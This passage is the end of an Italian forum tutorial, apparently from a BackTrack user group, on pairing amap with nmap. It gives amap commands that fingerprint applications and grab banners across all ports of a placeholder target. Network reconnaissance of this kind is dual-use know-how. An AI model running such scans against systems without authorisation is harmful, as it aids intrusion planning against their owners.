bt~# amap -qbp http TARGET 1-65535

Quest’altro dà output migliori per quanto riguarda il banner in ascolto sulla porta:
bt~# amap -B -q TARGET 1-65535

Infine volevo dirvi che per chiunque volesse provare la beta di aMap è sufficiente mandare una mail di
richiesta a: amap-subscribe@thc.org. Se invece volete aiutare gli sviluppatori per la scoperta di applicazioni sconosciute ed inefficienza dei pacchetti vi basterà inviare l’ inizio dei pacchetti mandati e ricevuti con il nome e la versione dei software utilizzati a: amap-dev@thc.org.

Credo sia tutto e spero che questo sia bastato a farvi capire quanto sia importante l’interazione tra 2 tool importantissimi come nMap e aMap per la scansione di un host e la scoperta di applicazioni eventualmente presenti su di esso

Ciao a tutti e alla prossima da RedBaron

Google Gruppi
backtrack-it
Visita questo gruppo